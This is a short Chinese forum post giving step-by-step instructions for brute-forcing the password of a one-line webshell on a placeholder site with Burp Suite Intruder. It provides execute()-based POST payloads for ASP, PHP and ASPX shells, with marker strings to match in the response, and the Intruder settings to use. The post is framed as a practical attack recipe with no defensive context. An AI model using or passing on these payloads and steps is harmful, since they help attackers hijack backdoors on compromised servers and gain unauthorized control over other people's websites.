利用burp爆破一句话步骤

论坛 期权论坛 脚本     
匿名技术用户   2020-12-21 20:47   11   0

如一句话地址:www.xxx.com/a.asp


(1)利用burp截包,转get的方式为post方式,添加POST数据如下:

asp password=execute("response.clear:response.write(""passwordright""):response.end")

php password=execute("response.clear:response.write(""elseHelloWorld""):response.end")

aspx password=execute("response.clear:response.write(""elseHelloWorld""):response.end")

其中password是要添加的字典!

(2)转到Intruter,设置password为爆破字段:$password$

(3)match添加

asp为 passwordright,

php和aspx为 elseHelloWorld

(4)attack即可!

分享到 :
0 人收藏
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

积分:7942463
帖子:1588486
精华:0
期权论坛 期权论坛
发布
内容

下载期权论坛手机APP